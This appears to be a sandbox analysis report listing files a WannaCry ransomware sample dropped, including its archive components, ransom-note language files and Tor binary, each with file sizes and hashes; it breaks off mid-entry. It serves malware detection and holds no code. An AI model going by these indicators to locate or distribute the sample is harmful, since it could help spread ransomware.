C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\5c5c6312112ff61c450a128aac024772bd3cca6c\index.txt

Filesize
194B

MD5
4671fabea4ba2ae44c11d658c2aa9343

SHA1
b2d3ac1fccfbb1e99c56fb0709a583b51e1baa01

SHA256
ec56ca157cbbd2ac422f4b36ab242342fdd5aafe11bf7c906dd858be6a41c9fe

SHA512
44c559f530e1e901eb34cdd666060e6457a2649e27150b6ca08ff58780ce181328ed061254a1299540a10608f9a91696113d2c965ba18797855600655553cc78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\5c5c6312112ff61c450a128aac024772bd3cca6c\index.txt~RFe60dbfc.TMP

Filesize
133B

MD5
702aba9e48d1368646f96bae9d22f7c1

SHA1
d8720de026f89d4ddc711f0407c5713129db30e0

SHA256
d61f885a3ec79c2a3d49860a395c0bfa9df1364c05037614364334fddef6dd23

SHA512
98b75ef29014236e885114a6721bde3264020bae309c906e9dc486eb34f6624fd1476ba492fd1c51a6a413b745124790a531e2985e4678a778591843fdbca881

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
3aa2adb2d696639425ca351c8de19e31

SHA1
a310ce2f031569a08b102356cac34bd73603d437

SHA256
e6bce682c4daedcd5ac29c968cdcd3d4a3a3b9c4129b8fcb56c66b97b8cd84c7

SHA512
5c083925e596bf6261994051dc1dd6ef10c8a123b5077f3446a48cf2c30efcfe9ac5bb02bcbc858095dbed088251da2a46cfc160fdc204d004266a7d1da47d1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe60fbf8.TMP

Filesize
48B

MD5
dae545c38261ff1764e1cc3eb674fb35

SHA1
58fa93899a16c9b0093fd821ab273678cdf4e70d

SHA256
d19c8b052fcac95cece9152517d608d76964a7e2b0b979e9e28c412772bc298b

SHA512
c4545408e5d7222b08ea2e0d2dbfc4f6e0ab5da2533273ec07d24d02c24478d5b26bdd4a67028a3919e1ef5c42fff6f365d1cd643a3c3c786048c085cf3a3976

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
8a943c4c78f9c02747630311f4b72f34

SHA1
12e2ba6e26a8c01780a8639097d9b4157c93b78f

SHA256
433dd5a8e964fef7cf1080b8d4b32fd17c88d4a1535a5cb995e13532fa2ce917

SHA512
046f20c04c5855acc53edcee8fcc0135456013da418f8ca89537cd69c0f21d2247958c524a1bc790562692e77909bfce00fd596c07cd0cde6592a2c16645fff4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
dea3da2b68068751560ad1d164a04136

SHA1
8fa15d6d2cf90e9159aa1d99404ceda9fb1a2340

SHA256
30f4d9af96c4eb5a06c4a535d6888f6e00186dcd6aa09dfc8d5255d591102d4d

SHA512
419b55a3d8cf309bfb89d04c7406b564e42eb2a145bf1db228aa554e0d01009badabfa505f7447ae159bda72464f93b335fa37874ac6a2b18f8ea797f0db3070

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
d5e99934284ceaf4586eb19a0e4d709e

SHA1
b07b2292206efb6603ed4120fd32019f6b9af841

SHA256
5668857d71263396952588ebcb36f0b87e15610a1220b21725a5628929b70b12

SHA512
f1307c9745a8f31992ba3f6d2bb38159241ced2bbdd8d3623e391cd50ea202f0cb2f27224a82b77799a24262439f2a0ace6d3a16e41d492db2767c8169958d25

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
bf60631dc7201a3bd3883f7ac85b758b

SHA1
9c53d742c6637632b542ae87a9d373ba1865bc45

SHA256
e5c5b69fe8cfdadd180a610315578e3dceb88b35d1ead0606f30b867d6dc3f1f

SHA512
01789f4ac0f9703fb9336e201428fe178716d994691375b9f124cc6dbdb24eaac9d551004981e4b70043fe4325a528108ef108d354967f9581d66b0f41352eeb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
486431c857fee4a8c6a29c6bfdd6f9af

SHA1
b82669d200869ea4bb08a28c8fe35e93b69516f0

SHA256
a178730e03e95f447a64a3bbd1b29d1557d6082b0fd4f785aaeecbc456141911

SHA512
11e00a5d1c4c31ed484e40c009b7c637dd990137c7e2ac72d65871015ee8a7bf5843a9600681ec3035f9dbc4f3ea1c57db856f8247d79ce6334bb39c2d945c39

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
82075d2f4e0341f3652ecad22329ebba

SHA1
99920291dc019b0e9b52d41a88691cfb42f377ff

SHA256
9f19093a11b7567588eea233f6c892ae2ee4c6a30df85f39c63d1086321740a7

SHA512
28f540cc508748d06c4072c8ed419a056aacbe83c3a7a30de2d0ee182404d90f8dfbcc38008547853efd3ff5ba727f984e8cd482eb1f4d18197439b99fd7d9ec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
150KB

MD5
79df1b0d4fc29002a3e4a777ae24bb7c

SHA1
de4278c730ecc15def2b17d3968cc6e4a0116d5a

SHA256
bbbf4c0723ccbbdc8dc6a3072e9918827257a4e721c7c21b9650d3919c6a8a74

SHA512
2a6ac119b59b2dc5f6bb930c70fca0251eea50dd8b2a02ccd040cbbd9e00a05a670fa968a07d3c4762bb2eed18a314959f3dd13419d5c501387b75f7d33063b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
167KB

MD5
e105f4fbefed73de28a56b4833007396

SHA1
e834e59d7dfa240d7956a93c3ea5b9a4d428cff3

SHA256
a422ef42be8a2eb7e16124c74ab7fd4a35a35a6ea0ef3eafbd5c992aad4fd19b

SHA512
feef621cbfa0ca72c15713417668fb46adafc5572c9b6d23954df214ad3e60714c493822586857c8480302eba4455116840aa2469cba4ecceb8ae75e2d6e9b59

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
110KB

MD5
9926641b4f4c5cdd05ebdce95c77d460

SHA1
6584c109703973821ca39bb0c91d9f7bc43de29d

SHA256
14d5a4b7c9546163652b4eb59f7de30451e604643a62bd5784d6e87b160997e1

SHA512
bee566b4149d03ec59ed72334a40b71813d7b44f8cc340c6fff41d232bf88a625b5b582d9d7ca0bfd550fd37dc95671318827313765b5ca4ee0d9a3688ab645d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
109KB

MD5
1e35775eae6c4e84ad394e8beaf9bc6e

SHA1
a0e33d9ee0fd60ce145f44c177a42ea6c0cf7b52

SHA256
fe2c450d5b84424f8bb8f188c93a07511f29e9d4795dd56f50be1a93023dc3ae

SHA512
b9efd47f3395910eef592436e9ab17e2ee9b670a9ae82a875a52603e7b77a1f708e490ebe6da68dcffcd89961d84716f7929fb9c1dcb73c37cecf7284d8a767c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe586a00.TMP

Filesize
98KB

MD5
e71b609153a653c76585ad221355ca36

SHA1
ca9196abd1934b118bbcdaab81751d094d69ccea

SHA256
71f4283203283fda2d04fe828267de3d91873bd54116c9dc6b4ead91f538c7d6

SHA512
d18b8f7effd02ec252d3931f08177903d7eb3ec9ea3eee922c2d5971b9ee480780f00d0fb657e38e412fd2f19416dd7afcedc6fc410cde2bcf14d1aa765b9e1e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\112351720038089.bat

Filesize
400B

MD5
ab68d3aceaca7f8bb94cdeabdcf54419

SHA1
5a2523f89e9e6dde58082d4f9cf3da4ccc4aae26

SHA256
3161fdccd23f68410f6d8b260d6c6b65e9dfb59ef44aef39ebb9d21e24f7c832

SHA512
a5de5e903e492a6c9bcf9fbc90b5f88a031a14fca8ee210d98507560290d399f138b521d96e411385279f47e8de6a959234a094e084c2e7e6c92c0ea57778f64

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Filesize
933B

MD5
7e6b6da7c61fcb66f3f30166871def5b

SHA1
00f699cf9bbc0308f6e101283eca15a7c566d4f9

SHA256
4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e

SHA512
e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Filesize
1KB

MD5
fabba287caa8027608af709955b4c03a

SHA1
fe34df429d60e753fa89a7dc2d56aeaca3252c33

SHA256
a6aa312e9990c09d6855deaeaf97ffa7cfe91668b69ff53d4ef9e2d685d84cc3

SHA512
202e0f7f95e5a11eadb5126551ba53cf7741f030067dbea609fc4ba1bc8851297b0c16c1f31214779ea65f9fa18b1052cc4119be254b47ea9eccbb4371bd8e3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnry

Filesize
780B

MD5
93f33b83f1f263e2419006d6026e7bc1

SHA1
1a4b36c56430a56af2e0ecabd754bf00067ce488

SHA256
ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

SHA512
45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\m.vbs

Filesize
279B

MD5
e9c14ec69b88c31071e0d1f0ae3bf2ba

SHA1
b0eaefa9ca72652aa177c1efdf1d22777e37ea84

SHA256
99af07e8064d0a04d6b706c870f2a02c42f167ffe98fce549aabc450b305a1e6

SHA512
fdd336b2c3217829a2eeffa6e2b116391b961542c53eb995d09ad346950b8c87507ad9891decd48f8f9286d36b2971417a636b86631a579e6591c843193c1981

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\s.wnry

Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe

Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe

Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4mhhjddz.dib.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
